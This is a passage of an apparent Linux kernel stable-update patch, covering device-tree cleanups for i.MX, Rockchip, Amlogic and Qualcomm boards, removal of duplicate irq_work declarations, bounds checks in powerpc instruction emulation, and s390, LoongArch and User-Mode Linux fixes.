+ 	};
+@@ -90,7 +90,7 @@
+ &weim {
+ 	status = "okay";
+ 
+-	nor: nor@0,0 {
++	nor: flash@0,0 {
+ 		#address-cells = <1>;
+ 		#size-cells = <1>;
+ 		compatible = "cfi-flash";
+diff --git a/arch/arm/boot/dts/imx27-eukrea-mbimxsd27-baseboard.dts b/arch/arm/boot/dts/imx27-eukrea-mbimxsd27-baseboard.dts
+index 9c3ec82ec7e5a..50fa0bd4c8a18 100644
+--- a/arch/arm/boot/dts/imx27-eukrea-mbimxsd27-baseboard.dts
++++ b/arch/arm/boot/dts/imx27-eukrea-mbimxsd27-baseboard.dts
+@@ -16,7 +16,7 @@
+ 
+ 		display-timings {
+ 			native-mode = <&timing0>;
+-			timing0: 320x240 {
++			timing0: timing0 {
+ 				clock-frequency = <6500000>;
+ 				hactive = <320>;
+ 				vactive = <240>;
+diff --git a/arch/arm/boot/dts/imx27-phytec-phycard-s-rdk.dts b/arch/arm/boot/dts/imx27-phytec-phycard-s-rdk.dts
+index 188639738dc3e..7f36af150a254 100644
+--- a/arch/arm/boot/dts/imx27-phytec-phycard-s-rdk.dts
++++ b/arch/arm/boot/dts/imx27-phytec-phycard-s-rdk.dts
+@@ -19,7 +19,7 @@
+ 		fsl,pcr = <0xf0c88080>;	/* non-standard but required */
+ 		display-timings {
+ 			native-mode = <&timing0>;
+-			timing0: 640x480 {
++			timing0: timing0 {
+ 				hactive = <640>;
+ 				vactive = <480>;
+ 				hback-porch = <112>;
+diff --git a/arch/arm/boot/dts/imx27-phytec-phycore-rdk.dts b/arch/arm/boot/dts/imx27-phytec-phycore-rdk.dts
+index 344e777901524..d133b9f08b3a0 100644
+--- a/arch/arm/boot/dts/imx27-phytec-phycore-rdk.dts
++++ b/arch/arm/boot/dts/imx27-phytec-phycore-rdk.dts
+@@ -19,7 +19,7 @@
+ 
+ 		display-timings {
+ 			native-mode = <&timing0>;
+-			timing0: 240x320 {
++			timing0: timing0 {
+ 				clock-frequency = <5500000>;
+ 				hactive = <240>;
+ 				vactive = <320>;
+diff --git a/arch/arm/boot/dts/imx27-phytec-phycore-som.dtsi b/arch/arm/boot/dts/imx27-phytec-phycore-som.dtsi
+index 3d10273177e9b..a5fdc2fd4ce5a 100644
+--- a/arch/arm/boot/dts/imx27-phytec-phycore-som.dtsi
++++ b/arch/arm/boot/dts/imx27-phytec-phycore-som.dtsi
+@@ -322,7 +322,7 @@
+ &weim {
+ 	status = "okay";
+ 
+-	nor: nor@0,0 {
++	nor: flash@0,0 {
+ 		compatible = "cfi-flash";
+ 		reg = <0 0x00000000 0x02000000>;
+ 		bank-width = <2>;
+diff --git a/arch/arm/boot/dts/imx27.dtsi b/arch/arm/boot/dts/imx27.dtsi
+index e140307be2e7d..eb6daf22486e4 100644
+--- a/arch/arm/boot/dts/imx27.dtsi
++++ b/arch/arm/boot/dts/imx27.dtsi
+@@ -588,6 +588,9 @@
+ 		iram: sram@ffff4c00 {
+ 			compatible = "mmio-sram";
+ 			reg = <0xffff4c00 0xb400>;
++			ranges = <0 0xffff4c00 0xb400>;
++			#address-cells = <1>;
++			#size-cells = <1>;
+ 		};
+ 	};
+ };
+diff --git a/arch/arm/boot/dts/imx28.dtsi b/arch/arm/boot/dts/imx28.dtsi
+index 130b4145af827..b15df16ecb01a 100644
+--- a/arch/arm/boot/dts/imx28.dtsi
++++ b/arch/arm/boot/dts/imx28.dtsi
+@@ -994,7 +994,7 @@
+ 				status = "disabled";
+ 			};
+ 
+-			dma_apbx: dma-apbx@80024000 {
++			dma_apbx: dma-controller@80024000 {
+ 				compatible = "fsl,imx28-dma-apbx";
+ 				reg = <0x80024000 0x2000>;
+ 				interrupts = <78 79 66 0
+diff --git a/arch/arm/boot/dts/imx7d.dtsi b/arch/arm/boot/dts/imx7d.dtsi
+index 7ceb7c09f7ad4..7ef685fdda55e 100644
+--- a/arch/arm/boot/dts/imx7d.dtsi
++++ b/arch/arm/boot/dts/imx7d.dtsi
+@@ -208,9 +208,6 @@
+ };
+ 
+ &ca_funnel_in_ports {
+-	#address-cells = <1>;
+-	#size-cells = <0>;
+-
+ 	port@1 {
+ 		reg = <1>;
+ 		ca_funnel_in_port1: endpoint {
+diff --git a/arch/arm/boot/dts/imx7s.dtsi b/arch/arm/boot/dts/imx7s.dtsi
+index 45947707134b8..4b23630fc738d 100644
+--- a/arch/arm/boot/dts/imx7s.dtsi
++++ b/arch/arm/boot/dts/imx7s.dtsi
+@@ -190,7 +190,11 @@
+ 			clock-names = "apb_pclk";
+ 
+ 			ca_funnel_in_ports: in-ports {
+-				port {
++				#address-cells = <1>;
++				#size-cells = <0>;
++
++				port@0 {
++					reg = <0>;
+ 					ca_funnel_in_port0: endpoint {
+ 						remote-endpoint = <&etm0_out_port>;
+ 					};
+@@ -814,7 +818,7 @@
+ 			};
+ 
+ 			lcdif: lcdif@30730000 {
+-				compatible = "fsl,imx7d-lcdif", "fsl,imx28-lcdif";
++				compatible = "fsl,imx7d-lcdif", "fsl,imx6sx-lcdif";
+ 				reg = <0x30730000 0x10000>;
+ 				interrupts = <GIC_SPI 5 IRQ_TYPE_LEVEL_HIGH>;
+ 				clocks = <&clks IMX7D_LCDIF_PIXEL_ROOT_CLK>,
+@@ -1279,7 +1283,7 @@
+ 		gpmi: nand-controller@33002000{
+ 			compatible = "fsl,imx7d-gpmi-nand";
+ 			#address-cells = <1>;
+-			#size-cells = <1>;
++			#size-cells = <0>;
+ 			reg = <0x33002000 0x2000>, <0x33004000 0x4000>;
+ 			reg-names = "gpmi-nand", "bch";
+ 			interrupts = <GIC_SPI 14 IRQ_TYPE_LEVEL_HIGH>;
+diff --git a/arch/arm/boot/dts/rk3036.dtsi b/arch/arm/boot/dts/rk3036.dtsi
+index 78686fc72ce69..c420c7c642cb0 100644
+--- a/arch/arm/boot/dts/rk3036.dtsi
++++ b/arch/arm/boot/dts/rk3036.dtsi
+@@ -402,12 +402,20 @@
+ 		pinctrl-0 = <&hdmi_ctl>;
+ 		status = "disabled";
+ 
+-		hdmi_in: port {
++		ports {
+ 			#address-cells = <1>;
+ 			#size-cells = <0>;
+-			hdmi_in_vop: endpoint@0 {
++
++			hdmi_in: port@0 {
+ 				reg = <0>;
+-				remote-endpoint = <&vop_out_hdmi>;
++
++				hdmi_in_vop: endpoint {
++					remote-endpoint = <&vop_out_hdmi>;
++				};
++			};
++
++			hdmi_out: port@1 {
++				reg = <1>;
+ 			};
+ 		};
+ 	};
+diff --git a/arch/arm/include/asm/irq_work.h b/arch/arm/include/asm/irq_work.h
+index 3149e4dc1b540..8895999834cc0 100644
+--- a/arch/arm/include/asm/irq_work.h
++++ b/arch/arm/include/asm/irq_work.h
+@@ -9,6 +9,4 @@ static inline bool arch_irq_work_has_interrupt(void)
+ 	return is_smp();
+ }
+ 
+-extern void arch_irq_work_raise(void);
+-
+ #endif /* _ASM_ARM_IRQ_WORK_H */
+diff --git a/arch/arm64/boot/dts/amlogic/meson-s4-s805x2-aq222.dts b/arch/arm64/boot/dts/amlogic/meson-s4-s805x2-aq222.dts
+index 8ffbcb2b1ac59..bbd3c05cbd908 100644
+--- a/arch/arm64/boot/dts/amlogic/meson-s4-s805x2-aq222.dts
++++ b/arch/arm64/boot/dts/amlogic/meson-s4-s805x2-aq222.dts
+@@ -15,7 +15,7 @@
+ 	#size-cells = <2>;
+ 
+ 	aliases {
+-		serial0 = &uart_B;
++		serial0 = &uart_b;
+ 	};
+ 
+ 	memory@0 {
+@@ -25,6 +25,6 @@
+ 
+ };
+ 
+-&uart_B {
++&uart_b {
+ 	status = "okay";
+ };
+diff --git a/arch/arm64/boot/dts/amlogic/meson-s4.dtsi b/arch/arm64/boot/dts/amlogic/meson-s4.dtsi
+index ad50cba42d19a..372a03762d69b 100644
+--- a/arch/arm64/boot/dts/amlogic/meson-s4.dtsi
++++ b/arch/arm64/boot/dts/amlogic/meson-s4.dtsi
+@@ -118,14 +118,14 @@
+ 					<10 11 12 13 14 15 16 17 18 19 20 21>;
+ 			};
+ 
+-			uart_B: serial@7a000 {
++			uart_b: serial@7a000 {
+ 				compatible = "amlogic,meson-s4-uart",
+ 					     "amlogic,meson-ao-uart";
+ 				reg = <0x0 0x7a000 0x0 0x18>;
+ 				interrupts = <GIC_SPI 169 IRQ_TYPE_EDGE_RISING>;
+-				status = "disabled";
+ 				clocks = <&xtal>, <&xtal>, <&xtal>;
+ 				clock-names = "xtal", "pclk", "baud";
++				status = "disabled";
+ 			};
+ 
+ 			reset: reset-controller@2000 {
+diff --git a/arch/arm64/boot/dts/qcom/msm8996.dtsi b/arch/arm64/boot/dts/qcom/msm8996.dtsi
+index 9de2248a385a5..789121171a110 100644
+--- a/arch/arm64/boot/dts/qcom/msm8996.dtsi
++++ b/arch/arm64/boot/dts/qcom/msm8996.dtsi
+@@ -390,6 +390,19 @@
+ 		reg = <0x0 0x80000000 0x0 0x0>;
+ 	};
+ 
++	etm {
++		compatible = "qcom,coresight-remote-etm";
++
++		out-ports {
++			port {
++				modem_etm_out_funnel_in2: endpoint {
++					remote-endpoint =
++					  <&funnel_in2_in_modem_etm>;
++				};
++			};
++		};
++	};
++
+ 	psci {
+ 		compatible = "arm,psci-1.0";
+ 		method = "smc";
+@@ -2565,6 +2578,14 @@
+ 			clocks = <&rpmcc RPM_QDSS_CLK>, <&rpmcc RPM_QDSS_A_CLK>;
+ 			clock-names = "apb_pclk", "atclk";
+ 
++			in-ports {
++				port {
++					funnel_in2_in_modem_etm: endpoint {
++						remote-endpoint =
++						  <&modem_etm_out_funnel_in2>;
++					};
++				};
++			};
+ 
+ 			out-ports {
+ 				port {
+diff --git a/arch/arm64/boot/dts/qcom/msm8998.dtsi b/arch/arm64/boot/dts/qcom/msm8998.dtsi
+index b00b8164c4aa2..7a41250539ff5 100644
+--- a/arch/arm64/boot/dts/qcom/msm8998.dtsi
++++ b/arch/arm64/boot/dts/qcom/msm8998.dtsi
+@@ -1903,9 +1903,11 @@
+ 
+ 			cpu = <&CPU4>;
+ 
+-			port{
+-				etm4_out: endpoint {
+-					remote-endpoint = <&apss_funnel_in4>;
++			out-ports {
++				port{
++					etm4_out: endpoint {
++						remote-endpoint = <&apss_funnel_in4>;
++					};
+ 				};
+ 			};
+ 		};
+@@ -1920,9 +1922,11 @@
+ 
+ 			cpu = <&CPU5>;
+ 
+-			port{
+-				etm5_out: endpoint {
+-					remote-endpoint = <&apss_funnel_in5>;
++			out-ports {
++				port{
++					etm5_out: endpoint {
++						remote-endpoint = <&apss_funnel_in5>;
++					};
+ 				};
+ 			};
+ 		};
+@@ -1937,9 +1941,11 @@
+ 
+ 			cpu = <&CPU6>;
+ 
+-			port{
+-				etm6_out: endpoint {
+-					remote-endpoint = <&apss_funnel_in6>;
++			out-ports {
++				port{
++					etm6_out: endpoint {
++						remote-endpoint = <&apss_funnel_in6>;
++					};
+ 				};
+ 			};
+ 		};
+@@ -1954,9 +1960,11 @@
+ 
+ 			cpu = <&CPU7>;
+ 
+-			port{
+-				etm7_out: endpoint {
+-					remote-endpoint = <&apss_funnel_in7>;
++			out-ports {
++				port{
++					etm7_out: endpoint {
++						remote-endpoint = <&apss_funnel_in7>;
++					};
+ 				};
+ 			};
+ 		};
+diff --git a/arch/arm64/include/asm/irq_work.h b/arch/arm64/include/asm/irq_work.h
+index 81bbfa3a035bd..a1020285ea750 100644
+--- a/arch/arm64/include/asm/irq_work.h
++++ b/arch/arm64/include/asm/irq_work.h
+@@ -2,8 +2,6 @@
+ #ifndef __ASM_IRQ_WORK_H
+ #define __ASM_IRQ_WORK_H
+ 
+-extern void arch_irq_work_raise(void);
+-
+ static inline bool arch_irq_work_has_interrupt(void)
+ {
+ 	return true;
+diff --git a/arch/arm64/kernel/irq.c b/arch/arm64/kernel/irq.c
+index 38dbd3828f139..d2850b49a3710 100644
+--- a/arch/arm64/kernel/irq.c
++++ b/arch/arm64/kernel/irq.c
+@@ -22,6 +22,7 @@
+ #include <linux/vmalloc.h>
+ #include <asm/daifflags.h>
+ #include <asm/exception.h>
++#include <asm/numa.h>
+ #include <asm/vmap_stack.h>
+ #include <asm/softirq_stack.h>
+ 
+@@ -46,17 +47,17 @@ static void init_irq_scs(void)
+ 
+ 	for_each_possible_cpu(cpu)
+ 		per_cpu(irq_shadow_call_stack_ptr, cpu) =
+-			scs_alloc(cpu_to_node(cpu));
++			scs_alloc(early_cpu_to_node(cpu));
+ }
+ 
+ #ifdef CONFIG_VMAP_STACK
+-static void init_irq_stacks(void)
++static void __init init_irq_stacks(void)
+ {
+ 	int cpu;
+ 	unsigned long *p;
+ 
+ 	for_each_possible_cpu(cpu) {
+-		p = arch_alloc_vmap_stack(IRQ_STACK_SIZE, cpu_to_node(cpu));
++		p = arch_alloc_vmap_stack(IRQ_STACK_SIZE, early_cpu_to_node(cpu));
+ 		per_cpu(irq_stack_ptr, cpu) = p;
+ 	}
+ }
+diff --git a/arch/arm64/kernel/perf_event.c b/arch/arm64/kernel/perf_event.c
+index 7b0643fe2f134..214b1805e536e 100644
+--- a/arch/arm64/kernel/perf_event.c
++++ b/arch/arm64/kernel/perf_event.c
+@@ -168,7 +168,11 @@ armv8pmu_events_sysfs_show(struct device *dev,
+ 	PMU_EVENT_ATTR_ID(name, armv8pmu_events_sysfs_show, config)
+ 
+ static struct attribute *armv8_pmuv3_event_attrs[] = {
+-	ARMV8_EVENT_ATTR(sw_incr, ARMV8_PMUV3_PERFCTR_SW_INCR),
++	/*
++	 * Don't expose the sw_incr event in /sys. It's not usable as writes to
++	 * PMSWINC_EL0 will trap as PMUSERENR.{SW,EN}=={0,0} and event rotation
++	 * means we don't have a fixed event<->counter relationship regardless.
++	 */
+ 	ARMV8_EVENT_ATTR(l1i_cache_refill, ARMV8_PMUV3_PERFCTR_L1I_CACHE_REFILL),
+ 	ARMV8_EVENT_ATTR(l1i_tlb_refill, ARMV8_PMUV3_PERFCTR_L1I_TLB_REFILL),
+ 	ARMV8_EVENT_ATTR(l1d_cache_refill, ARMV8_PMUV3_PERFCTR_L1D_CACHE_REFILL),
+diff --git a/arch/csky/include/asm/irq_work.h b/arch/csky/include/asm/irq_work.h
+index 33aaf39d6f94f..d39fcc1f5395f 100644
+--- a/arch/csky/include/asm/irq_work.h
++++ b/arch/csky/include/asm/irq_work.h
+@@ -7,5 +7,5 @@ static inline bool arch_irq_work_has_interrupt(void)
+ {
+ 	return true;
+ }
+-extern void arch_irq_work_raise(void);
++
+ #endif /* __ASM_CSKY_IRQ_WORK_H */
+diff --git a/arch/loongarch/kernel/smp.c b/arch/loongarch/kernel/smp.c
+index 434bfc1cd31a4..e0404df2c952f 100644
+--- a/arch/loongarch/kernel/smp.c
++++ b/arch/loongarch/kernel/smp.c
+@@ -473,7 +473,6 @@ asmlinkage void start_secondary(void)
+ 	sync_counter();
+ 	cpu = raw_smp_processor_id();
+ 	set_my_cpu_offset(per_cpu_offset(cpu));
+-	rcu_cpu_starting(cpu);
+ 
+ 	cpu_probe();
+ 	constant_clockevent_init();
+diff --git a/arch/loongarch/mm/tlb.c b/arch/loongarch/mm/tlb.c
+index da3681f131c8d..eeb2d815cfa2a 100644
+--- a/arch/loongarch/mm/tlb.c
++++ b/arch/loongarch/mm/tlb.c
+@@ -271,12 +271,16 @@ void setup_tlb_handler(int cpu)
+ 		set_handler(EXCCODE_TLBNR * VECSIZE, handle_tlb_protect, VECSIZE);
+ 		set_handler(EXCCODE_TLBNX * VECSIZE, handle_tlb_protect, VECSIZE);
+ 		set_handler(EXCCODE_TLBPE * VECSIZE, handle_tlb_protect, VECSIZE);
+-	}
++	} else {
++		int vec_sz __maybe_unused;
++		void *addr __maybe_unused;
++		struct page *page __maybe_unused;
++
++		/* Avoid lockdep warning */
++		rcu_cpu_starting(cpu);
++
+ #ifdef CONFIG_NUMA
+-	else {
+-		void *addr;
+-		struct page *page;
+-		const int vec_sz = sizeof(exception_handlers);
++		vec_sz = sizeof(exception_handlers);
+ 
+ 		if (pcpu_handlers[cpu])
+ 			return;
+@@ -292,8 +296,8 @@ void setup_tlb_handler(int cpu)
+ 		csr_write64(pcpu_handlers[cpu], LOONGARCH_CSR_EENTRY);
+ 		csr_write64(pcpu_handlers[cpu], LOONGARCH_CSR_MERRENTRY);
+ 		csr_write64(pcpu_handlers[cpu] + 80*VECSIZE, LOONGARCH_CSR_TLBRENTRY);
+-	}
+ #endif
++	}
+ }
+ 
+ void tlb_init(int cpu)
+diff --git a/arch/powerpc/include/asm/irq_work.h b/arch/powerpc/include/asm/irq_work.h
+index b8b0be8f1a07e..c6d3078bd8c3b 100644
+--- a/arch/powerpc/include/asm/irq_work.h
++++ b/arch/powerpc/include/asm/irq_work.h
+@@ -6,6 +6,5 @@ static inline bool arch_irq_work_has_interrupt(void)
+ {
+ 	return true;
+ }
+-extern void arch_irq_work_raise(void);
+ 
+ #endif /* _ASM_POWERPC_IRQ_WORK_H */
+diff --git a/arch/powerpc/include/asm/mmu.h b/arch/powerpc/include/asm/mmu.h
+index 94b981152667c..07fabb054aea4 100644
+--- a/arch/powerpc/include/asm/mmu.h
++++ b/arch/powerpc/include/asm/mmu.h
+@@ -417,5 +417,9 @@ extern void *abatron_pteptrs[2];
+ #include <asm/nohash/mmu.h>
+ #endif
+ 
++#if defined(CONFIG_FA_DUMP) || defined(CONFIG_PRESERVE_FA_DUMP)
++#define __HAVE_ARCH_RESERVED_KERNEL_PAGES
++#endif
++
+ #endif /* __KERNEL__ */
+ #endif /* _ASM_POWERPC_MMU_H_ */
+diff --git a/arch/powerpc/include/asm/mmzone.h b/arch/powerpc/include/asm/mmzone.h
+index 4c6c6dbd182f4..da827d2d08666 100644
+--- a/arch/powerpc/include/asm/mmzone.h
++++ b/arch/powerpc/include/asm/mmzone.h
+@@ -42,14 +42,6 @@ u64 memory_hotplug_max(void);
+ #else
+ #define memory_hotplug_max() memblock_end_of_DRAM()
+ #endif /* CONFIG_NUMA */
+-#ifdef CONFIG_FA_DUMP
+-#define __HAVE_ARCH_RESERVED_KERNEL_PAGES
+-#endif
+-
+-#ifdef CONFIG_MEMORY_HOTPLUG
+-extern int create_section_mapping(unsigned long start, unsigned long end,
+-				  int nid, pgprot_t prot);
+-#endif
+ 
+ #endif /* __KERNEL__ */
+ #endif /* _ASM_MMZONE_H_ */
+diff --git a/arch/powerpc/kernel/traps.c b/arch/powerpc/kernel/traps.c
+index 3956f32682c62..362b712386f64 100644
+--- a/arch/powerpc/kernel/traps.c
++++ b/arch/powerpc/kernel/traps.c
+@@ -1439,10 +1439,12 @@ static int emulate_instruction(struct pt_regs *regs)
+ 	return -EINVAL;
+ }
+ 
++#ifdef CONFIG_GENERIC_BUG
+ int is_valid_bugaddr(unsigned long addr)
+ {
+ 	return is_kernel_addr(addr);
+ }
++#endif
+ 
+ #ifdef CONFIG_MATH_EMULATION
+ static int emulate_math(struct pt_regs *regs)
+diff --git a/arch/powerpc/lib/sstep.c b/arch/powerpc/lib/sstep.c
+index 398b5694aeb70..ec30af8eadb7d 100644
+--- a/arch/powerpc/lib/sstep.c
++++ b/arch/powerpc/lib/sstep.c
+@@ -586,6 +586,8 @@ static int do_fp_load(struct instruction_op *op, unsigned long ea,
+ 	} u;
+ 
+ 	nb = GETSIZE(op->type);
++	if (nb > sizeof(u))
++		return -EINVAL;
+ 	if (!address_ok(regs, ea, nb))
+ 		return -EFAULT;
+ 	rn = op->reg;
+@@ -636,6 +638,8 @@ static int do_fp_store(struct instruction_op *op, unsigned long ea,
+ 	} u;
+ 
+ 	nb = GETSIZE(op->type);
++	if (nb > sizeof(u))
++		return -EINVAL;
+ 	if (!address_ok(regs, ea, nb))
+ 		return -EFAULT;
+ 	rn = op->reg;
+@@ -680,6 +684,9 @@ static nokprobe_inline int do_vec_load(int rn, unsigned long ea,
+ 		u8 b[sizeof(__vector128)];
+ 	} u = {};
+ 
++	if (size > sizeof(u))
++		return -EINVAL;
++
+ 	if (!address_ok(regs, ea & ~0xfUL, 16))
+ 		return -EFAULT;
+ 	/* align to multiple of size */
+@@ -707,6 +714,9 @@ static nokprobe_inline int do_vec_store(int rn, unsigned long ea,
+ 		u8 b[sizeof(__vector128)];
+ 	} u;
+ 
++	if (size > sizeof(u))
++		return -EINVAL;
++
+ 	if (!address_ok(regs, ea & ~0xfUL, 16))
+ 		return -EFAULT;
+ 	/* align to multiple of size */
+diff --git a/arch/powerpc/mm/book3s64/pgtable.c b/arch/powerpc/mm/book3s64/pgtable.c
+index f6151a5892982..87aa76c737995 100644
+--- a/arch/powerpc/mm/book3s64/pgtable.c
++++ b/arch/powerpc/mm/book3s64/pgtable.c
+@@ -463,6 +463,7 @@ void ptep_modify_prot_commit(struct vm_area_struct *vma, unsigned long addr,
+ 	set_pte_at(vma->vm_mm, addr, ptep, pte);
+ }
+ 
++#ifdef CONFIG_TRANSPARENT_HUGEPAGE
+ /*
+  * For hash translation mode, we use the deposited table to store hash slot
+  * information and they are stored at PTRS_PER_PMD offset from related pmd
+@@ -484,6 +485,7 @@ int pmd_move_must_withdraw(struct spinlock *new_pmd_ptl,
+ 
+ 	return true;
+ }
++#endif
+ 
+ /*
+  * Does the CPU support tlbie?
+diff --git a/arch/powerpc/mm/init-common.c b/arch/powerpc/mm/init-common.c
+index 119ef491f7976..d3a7726ecf512 100644
+--- a/arch/powerpc/mm/init-common.c
++++ b/arch/powerpc/mm/init-common.c
+@@ -126,7 +126,7 @@ void pgtable_cache_add(unsigned int shift)
+ 	 * as to leave enough 0 bits in the address to contain it. */
+ 	unsigned long minalign = max(MAX_PGTABLE_INDEX_SIZE + 1,
+ 				     HUGEPD_SHIFT_MASK + 1);
+-	struct kmem_cache *new;
++	struct kmem_cache *new = NULL;
+ 
+ 	/* It would be nice if this was a BUILD_BUG_ON(), but at the
+ 	 * moment, gcc doesn't seem to recognize is_power_of_2 as a
+@@ -139,7 +139,8 @@ void pgtable_cache_add(unsigned int shift)
+ 
+ 	align = max_t(unsigned long, align, minalign);
+ 	name = kasprintf(GFP_KERNEL, "pgtable-2^%d", shift);
+-	new = kmem_cache_create(name, table_size, align, 0, ctor(shift));
++	if (name)
++		new = kmem_cache_create(name, table_size, align, 0, ctor(shift));
+ 	if (!new)
+ 		panic("Could not allocate pgtable cache for order %d", shift);
+ 
+diff --git a/arch/powerpc/mm/mmu_decl.h b/arch/powerpc/mm/mmu_decl.h
+index bd9784f77f2ee..71250605b7845 100644
+--- a/arch/powerpc/mm/mmu_decl.h
++++ b/arch/powerpc/mm/mmu_decl.h
+@@ -179,3 +179,8 @@ static inline bool debug_pagealloc_enabled_or_kfence(void)
+ {
+ 	return IS_ENABLED(CONFIG_KFENCE) || debug_pagealloc_enabled();
+ }
++
++#ifdef CONFIG_MEMORY_HOTPLUG
++int create_section_mapping(unsigned long start, unsigned long end,
++			   int nid, pgprot_t prot);
++#endif
+diff --git a/arch/riscv/include/asm/irq_work.h b/arch/riscv/include/asm/irq_work.h
+index b53891964ae03..b27a4d64fc6a0 100644
+--- a/arch/riscv/include/asm/irq_work.h
++++ b/arch/riscv/include/asm/irq_work.h
+@@ -6,5 +6,5 @@ static inline bool arch_irq_work_has_interrupt(void)
+ {
+ 	return IS_ENABLED(CONFIG_SMP);
+ }
+-extern void arch_irq_work_raise(void);
++
+ #endif /* _ASM_RISCV_IRQ_WORK_H */
+diff --git a/arch/s390/include/asm/irq_work.h b/arch/s390/include/asm/irq_work.h
+index 603783766d0ab..f00c9f610d5a8 100644
+--- a/arch/s390/include/asm/irq_work.h
++++ b/arch/s390/include/asm/irq_work.h
+@@ -7,6 +7,4 @@ static inline bool arch_irq_work_has_interrupt(void)
+ 	return true;
+ }
+ 
+-void arch_irq_work_raise(void);
+-
+ #endif /* _ASM_S390_IRQ_WORK_H */
+diff --git a/arch/s390/kernel/ptrace.c b/arch/s390/kernel/ptrace.c
+index 092b16b4dd4f6..6b442edb38571 100644
+--- a/arch/s390/kernel/ptrace.c
++++ b/arch/s390/kernel/ptrace.c
+@@ -385,6 +385,7 @@ static int __poke_user(struct task_struct *child, addr_t addr, addr_t data)
+ 		/*
+ 		 * floating point control reg. is in the thread structure
+ 		 */
++		save_fpu_regs();
+ 		if ((unsigned int) data != 0 ||
+ 		    test_fp_ctl(data >> (BITS_PER_LONG - 32)))
+ 			return -EINVAL;
+@@ -741,6 +742,7 @@ static int __poke_user_compat(struct task_struct *child,
+ 		/*
+ 		 * floating point control reg. is in the thread structure
+ 		 */
++		save_fpu_regs();
+ 		if (test_fp_ctl(tmp))
+ 			return -EINVAL;
+ 		child->thread.fpu.fpc = data;
+@@ -904,9 +906,7 @@ static int s390_fpregs_set(struct task_struct *target,
+ 	int rc = 0;
+ 	freg_t fprs[__NUM_FPRS];
+ 
+-	if (target == current)
+-		save_fpu_regs();
+-
++	save_fpu_regs();
+ 	if (MACHINE_HAS_VX)
+ 		convert_vx_to_fp(fprs, target->thread.fpu.vxrs);
+ 	else
+diff --git a/arch/s390/kvm/kvm-s390.c b/arch/s390/kvm/kvm-s390.c
+index 3775363471f0c..f604946ab2c85 100644
+--- a/arch/s390/kvm/kvm-s390.c
++++ b/arch/s390/kvm/kvm-s390.c
+@@ -4138,10 +4138,6 @@ int kvm_arch_vcpu_ioctl_set_fpu(struct kvm_vcpu *vcpu, struct kvm_fpu *fpu)
+ 
+ 	vcpu_load(vcpu);
+ 
+-	if (test_fp_ctl(fpu->fpc)) {
+-		ret = -EINVAL;
+-		goto out;
+-	}
+ 	vcpu->run->s.regs.fpc = fpu->fpc;
+ 	if (MACHINE_HAS_VX)
+ 		convert_fp_to_vx((__vector128 *) vcpu->run->s.regs.vrs,
+@@ -4149,7 +4145,6 @@ int kvm_arch_vcpu_ioctl_set_fpu(struct kvm_vcpu *vcpu, struct kvm_fpu *fpu)
+ 	else
+ 		memcpy(vcpu->run->s.regs.fprs, &fpu->fprs, sizeof(fpu->fprs));
+ 
+-out:
+ 	vcpu_put(vcpu);
+ 	return ret;
+ }
+diff --git a/arch/um/drivers/net_kern.c b/arch/um/drivers/net_kern.c
+index 3d7836c465070..cabcc501b448a 100644
+--- a/arch/um/drivers/net_kern.c
++++ b/arch/um/drivers/net_kern.c
+@@ -204,7 +204,7 @@ static int uml_net_close(struct net_device *dev)
+ 	return 0;
+ }
+ 
+-static int uml_net_start_xmit(struct sk_buff *skb, struct net_device *dev)
++static netdev_tx_t uml_net_start_xmit(struct sk_buff *skb, struct net_device *dev)
+ {
+ 	struct uml_net_private *lp = netdev_priv(dev);
+ 	unsigned long flags;
+diff --git a/arch/um/include/shared/kern_util.h b/arch/um/include/shared/kern_util.h
+index d8b8b4f07e429..444bae755b16a 100644
+--- a/arch/um/include/shared/kern_util.h
++++ b/arch/um/include/shared/kern_util.h
+@@ -50,7 +50,7 @@ extern void do_uml_exitcalls(void);
+  * Are we disallowed to sleep? Used to choose between GFP_KERNEL and
+  * GFP_ATOMIC.
+  */
+-extern int __cant_sleep(void);
++extern int __uml_cant_sleep(void);
+ extern int get_current_pid(void);
+ extern int copy_from_user_proc(void *to, void *from, int size);
+ extern char *uml_strdup(const char *string);
+diff --git a/arch/um/kernel/process.c b/arch/um/kernel/process.c
+index 010bc422a09dd..a351c87db2488 100644
+--- a/arch/um/kernel/process.c
++++ b/arch/um/kernel/process.c
+@@ -220,7 +220,7 @@ void arch_cpu_idle(void)
+ 	raw_local_irq_enable();
+ }
+ 
+-int __cant_sleep(void) {
++int __uml_cant_sleep(void) {
+ 	return in_atomic() || irqs_disabled() || in_interrupt();
+ 	/* Is in_interrupt() really needed? */
+ }
+diff --git a/arch/um/kernel/time.c b/arch/um/kernel/time.c
+index fddd1dec27e6d..3e270da6b6f67 100644
+--- a/arch/um/kernel/time.c
++++ b/arch/um/kernel/time.c
+@@ -432,9 +432,29 @@ static void time_travel_update_time(unsigned long long next, bool idle)
+ 	time_travel_del_event(&ne);
+ }
+ 
++static void time_travel_update_time_rel(unsigned long long offs)
++{
++	unsigned long flags;
++
++	/*
++	 * Disable interrupts before calculating the new time so
++	 * that a real timer interrupt (signal) can't happen at
++	 * a bad time e.g. after we read time_travel_time but
++	 * before we've completed updating the time.
++	 */
++	local_irq_save(flags);
++	time_travel_update_time(time_travel_time + offs, false);
++	local_irq_restore(flags);
++}
++
+ void time_travel_ndelay(unsigned long nsec)
+ {
+-	time_travel_update_time(time_travel_time + nsec, false);
++	/*
++	 * Not strictly needed to use _rel() version since this is
++	 * only used in INFCPU/EXT modes, but it doesn't hurt and
++	 * is more readable too.
++	 */
++	time_travel_update_time_rel(nsec);
+ }
+ EXPORT_SYMBOL(time_travel_ndelay);
+ 
+@@ -568,7 +588,11 @@ static void time_travel_set_start(void)
+ #define time_travel_time 0
+ #define time_travel_ext_waiting 0
+ 
+-static inline void time_travel_update_time(unsigned long long ns, bool retearly)
++static inline void time_travel_update_time(unsigned long long ns, bool idle)
++{
++}
++
++static inline void time_travel_update_time_rel(unsigned long long offs)
+ {
+ }
+ 
+@@ -720,9 +744,7 @@ static u64 timer_read(struct clocksource *cs)
+ 		 */
+ 		if (!irqs_disabled() && !in_interrupt() && !in_softirq() &&
+ 		    !time_travel_ext_waiting)
+-			time_travel_update_time(time_travel_time +
+-						TIMER_MULTIPLIER,
+-						false);
++			time_travel_update_time_rel(TIMER_MULTIPLIER);
+ 		return time_travel_time / TIMER_MULTIPLIER;
+ 	}
+ 
+diff --git a/arch/um/os-Linux/helper.c b/arch/um/os-Linux/helper.c
+index b459745f52e24..3cb8ac63be6ed 100644
+--- a/arch/um/os-Linux/helper.c
++++ b/arch/um/os-Linux/helper.c
+@@ -46,7 +46,7 @@ int run_helper(void (*pre_exec)(void *), void *pre_data, char **argv)
+ 	unsigned long stack, sp;
+ 	int pid, fds[2], ret, n;
+ 
